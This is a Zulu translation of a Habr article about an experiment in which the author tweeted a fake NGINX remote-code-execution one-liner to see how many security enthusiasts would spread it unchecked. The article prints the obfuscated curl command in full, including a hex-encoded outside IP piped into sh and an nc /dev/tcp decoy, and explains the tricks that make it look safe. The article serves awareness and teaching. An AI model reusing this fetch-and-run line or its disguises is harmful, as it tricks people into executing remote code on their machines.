Impumelelo yokuhlolwa komphakathi ngokuxhashazwa kwe-nginx mbumbulu

Qaphela. transl.: umbhali inothi langempela, elanyatheliswa ngo-June 1, lanquma ukwenza ucwaningo phakathi kwalabo abathanda ukuphepha kolwazi. Ukwenza lokhu, walungiselela ukuxhashazwa okungelona iqiniso kobungozi obungadalulwanga kuseva yewebhu futhi wayithumela ku-Twitter yakhe. Ukucabanga kwakhe - ukudalulwa ngokushesha ngochwepheshe abazobona inkohliso esobala ekhodini - hhayi nje ukuthi akwenzekanga ... Badlula konke obekulindelwe, futhi ngakolunye uhlangothi: i-tweet yathola ukwesekwa okukhulu kubantu abaningi abangazange bafezeke. hlola elikuqukethe.

TL; DR: Ungasebenzisi i-pipelining yefayela ku-sh noma i-bash ngaphansi kwanoma yiziphi izimo. Lena indlela enhle yokulahlekelwa ukulawula ikhompuyutha yakho.

Ngifuna ukwabelana nawe ngendaba emfushane mayelana nokuxhashazwa kwe-PoC kwamahlaya okudalwe ngoMeyi 31st. Uvele ngokushesha ephendula izindaba ezivela Alisa Esage Shevchenko, ilungu I-Zero Day Initiative (ZDI), lolo lwazi olumayelana nokuba sengozini ku-NGINX oluholela ku-RCE (ukwenziwa kwekhodi yesilawuli kude) luzodalulwa maduze. Njengoba i-NGINX inika amandla amawebhusayithi amaningi, izindaba kumele zibe yibhomu. Kodwa ngenxa yokubambezeleka kwenqubo “yokudalulwa okunomthwalo wemfanelo”, imininingwane yalokho okwenzekile ibingaziwa - lena inqubo evamile ye-ZDI.

tweet mayelana nokudalulwa kokuba sengozini ku-NGINX

Ngemva kokuqeda ukusebenza ngendlela entsha ye-obfuscation ku-curl, ngacaphuna i-tweet yokuqala futhi “ngavuza i-PoC esebenzayo” ehlanganisa umugqa owodwa wekhodi okuthiwa uxhaphaza ubungozi obutholakele. Yebo, lokhu kwakuwumbhedo ophelele. Ngacabanga ukuthi ngizodalulwa ngokushesha, nokuthi okungcono ngizothola ama-retweets ambalwa (oh kahle).

tweet ngokuxhaphaza okungamanga

Nokho, angikwazanga ukukucabanga okwenzeka ngemva kwalokho. Udumo lwe-tweet yami lwenyuka kakhulu. Ngokumangalisayo, okwamanje (15:00 isikhathi saseMoscow ngoJuni 1) abantu abambalwa baye baqaphela ukuthi lokhu kuyinkohliso. Abantu abaningi bayayithumela kabusha ngaphandle kokuyihlola nhlobo (ingasaphathwa eyokuncoma ihluzo ezithandekayo ze-ASCII eziphumayo).

Bheka nje ukuthi yinhle kanjani!

Yize zonke lezi zihibe nemibala mihle, kuyacaca ukuthi abantu bekumele basebenzise ikhodi emshinini wabo ukuze babone. Ngenhlanhla, iziphequluli zisebenza ngendlela efanayo, futhi kuhlanganiswe neqiniso lokuthi bengingafuni ngempela ukungena enkingeni yezomthetho, ikhodi engcwatshwe kusayithi lami ibimane yenze izingcingo ze-echo ngaphandle kokuzama ukufaka noma ukwenza noma iyiphi ikhodi eyengeziwe.

Ukwehla okuncane: netspooky, dnz, mina nabanye abafana eqenjini Isixuku Besilokhu sidlala ngezindlela ezihlukene zokufiphaza imiyalo yama-curl isikhashana manje ngoba kuhle... futhi singamaqhawe. netspooky kanye ne-dnz bathole izindlela ezintsha ezimbalwa ezazibonakala zithembisa kakhulu kimi. Ngijoyine ubumnandi futhi ngazama ukungeza ukuguqulwa kwedesimali ye-IP esikhwameni samaqhinga. Kuvele ukuthi i-IP ingabuye iguqulelwe kufomethi ye-hexadecimal. Ngaphezu kwalokho, i-curl namanye amathuluzi amaningi we-NIX adla ngokujabula ama-IP we-hexadecimal! Ngakho-ke bekuyindaba nje yokudala umugqa womyalo okholisayo nobukeka uvikelekile. Ekugcineni nganquma kulokhu:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

I-Socio-electronic engineering (SEE) - ngaphezu kobugebengu bokweba imininingwane ebucayi

Ukuphepha nokujwayela bekuyingxenye enkulu yalolu cwaningo. Ngicabanga ukuthi yizona eziholele empumelelweni yakhe. Umugqa womyalo ubonisa ngokucacile ukuphepha ngokubhekisela kokuthi "127.0.0.1" (umsingathi wasendaweni owaziwa kakhulu). I-Localhost ithathwa njengevikelekile futhi idatha ekuyo ayilokothi ishiye ikhompuyutha yakho.

Ukujwayela bekuwukhiye wesibili wengxenye ye-SEE yokuhlolwa. Njengoba izethameli eziqondiwe ngokuyinhloko zazihlanganisa abantu abajwayelene nezisekelo zokuphepha kwekhompiyutha, kwakubalulekile ukudala ikhodi ukuze izingxenye zayo zibonakale zijwayelekile futhi zijwayelekile (ngakho-ke ziphephile). Izakhi zokuboleka zemiqondo emidala yokuxhaphaza nokuzihlanganisa ngendlela engavamile kuye kwafakazela ukuthi kuphumelele kakhulu.

Ngezansi ukuhlaziya okuningiliziwe komugqa owodwa. Konke kulolu hlu kuyagqokwa imvelo yezimonyo, futhi cishe akukho lutho oludingekayo ekusebenzeni kwayo kwangempela.

Yiziphi izingxenye ezidingekayo ngempela? Lokhu -gsS, -O 0x0238f06a, |sh kanye neseva yewebhu ngokwayo. Iseva yewebhu ibingenazo iziqondiso ezinonya, kodwa ivele yanikeza imidwebo ye-ASCII isebenzisa imiyalo echo kusikripthi esiqukethwe ku index.html. Lapho umsebenzisi efaka umugqa nge |sh phakathi, index.html kulayishiwe futhi kwenziwe. Ngenhlanhla, abagcini beseva yewebhu babengenazo izinhloso ezimbi.

• ../../../%00 - imele ukweqa uhla lwemibhalo;
• ngx_stream_module.so - indlela eya kumojula ye-NGINX engahleliwe;
• /bin/sh%00<'protocol:TCP' - kuthiwa siyethula /bin/sh emshinini oqondiwe futhi uqondise kabusha okukhiphayo esiteshini se-TCP;
• -O 0x0238f06a#PLToffset - isithako esiyimfihlo, sengeziwe #PLToffset, ukubukeka njenge-memory offset ngandlela thize equkethwe ku-PLT;
• |sh; - enye ingxenye ebalulekile. Besidinga ukuqondisa kabusha okukhiphayo ku-sh/bash ukuze sisebenzise ikhodi evela kuseva yewebhu ehlaselayo etholakala ku- 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - i-dummy lapho i-netcat ibhekisela kuyo /dev/tcp/localhostukuze yonke into ibukeke iphephile futhi. Eqinisweni, ayenzi lutho futhi ifakwe emgqeni wobuhle.

Lokhu kuphetha ukuqoshwa kweskripthi somugqa owodwa kanye nengxoxo yezingxenye “zobunjiniyela bezenhlalo nobuchwepheshe” (ubugebengu bokweba imininingwane ebucayi obuyinkimbinkimbi).

Ukucushwa Kweseva Yewebhu kanye Nezinyathelo Zokulwa

Njengoba iningi lababhalisi bami lingama-infosec/hackers, nginqume ukwenza iseva yewebhu imelane kancane nezinkulumo “zentshisekelo” kubo, ukuze nje abafana babe nokuthile abakwenzayo (futhi kungaba mnandi setha). Ngeke ngibhale zonke izingibe lapha njengoba ukuhlolwa kusaqhubeka, kodwa nazi izinto ezimbalwa ezenziwa yiseva:

• Iqapha ngenkuthalo imizamo yokusabalalisa kwamanye amanethiwekhi omphakathi futhi imiselele izithonjana zokuhlola kuqala ukuze zikhuthaze umsebenzisi ukuthi achofoze isixhumanisi.
• Iqondisa kabusha i-Chrome/Mozilla/Safari/njll kuvidiyo yokuphromotha ye-Thugcrowd esikhundleni sokubonisa umbhalo wegobolondo.
• Ukubuka kwezimpawu ezisobala zokungena/ukugebenga okusobala, abese eqala ukuqondisa kabusha izicelo kumaseva e-NSA (ha!).
• Ifaka i-Trojan, kanye ne-rootkit ye-BIOS, kuwo wonke amakhompyutha abasebenzisi bawo abavakashela umsingathi besuka kusiphequluli esivamile (ukudlala nje!).

Ingxenye encane yama-antimers

Kulokhu, inhloso yami kuphela kwakuwukufunda kahle ezinye zezici ze-Apache - ikakhulukazi, imithetho epholile yokuqondisa kabusha izicelo - futhi ngacabanga: kungani kungenjalo?

I-NGINX Exploit (Yangempela!)

Bhalisela ku @alisaesage ku-Twitter futhi ulandele umsebenzi omuhle we-ZDI ekubhekaneni nokukhubazeka kwangempela nokusebenzisa amathuba ku-NGINX. Umsebenzi wabo ubulokhu ungithakazelisa futhi ngimbonga u-Alice ngesineke sakhe ngakho konke okukhulunywe ngakho kanye nezaziso ezibangelwe yi-tweet yami yobuwula. Ngenhlanhla, futhi yenze okuhle: yasiza ekuqwashiseni ngobungozi be-NGINX, kanye nezinkinga ezibangelwa ukuhlukunyezwa kwe-curl.

Source: www.habr.com